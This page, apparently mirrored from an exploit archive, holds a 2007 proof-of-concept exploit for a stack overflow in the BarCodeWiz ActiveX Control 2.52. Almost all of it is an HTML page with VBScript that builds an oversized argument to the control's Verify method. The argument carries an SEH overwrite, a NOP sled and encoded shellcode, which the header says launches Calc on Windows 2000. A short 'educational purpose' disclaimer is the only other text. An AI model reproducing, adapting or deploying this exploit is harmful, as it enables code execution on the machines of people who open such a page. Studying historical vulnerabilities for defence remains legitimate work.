BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll) SEH Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll) SEH Overwrite Exploit
# Published : 2007-05-09
# Author : Parveen Vashishtha
# Previous Title : Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate EIP Overwrite
# Next Title : IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit

<!--

  ===============================================================================================
         BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll)Stack Overflow SEH Overwrite Exploit
                                          By Parveen Vashishtha
  ==============================================================================================   
        
  Date : 09-05-2007
 
   Open Calc on 2K
 
  
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Thanks to Metasploit and Stroke 

-->
<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6" > </OBJECT>

<script language="vbscript">




shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")                    

pointer_to_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")


targetFile = "C:Program FilesBarCodeWiz ActiveX DemoDLLBarcodeWiz.dll"
prototype  = "Function Verify ( ByVal Barcode As String ) As Boolean"
memberName = "Verify"
progid     = "BARCODEWIZLib.BarCodeWiz"
argCount   = 1

arg1=String(3256,"A")

arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop

target.Verify arg1

 

</script>
</body>
</html>

# www.Syue.com [2007-05-09]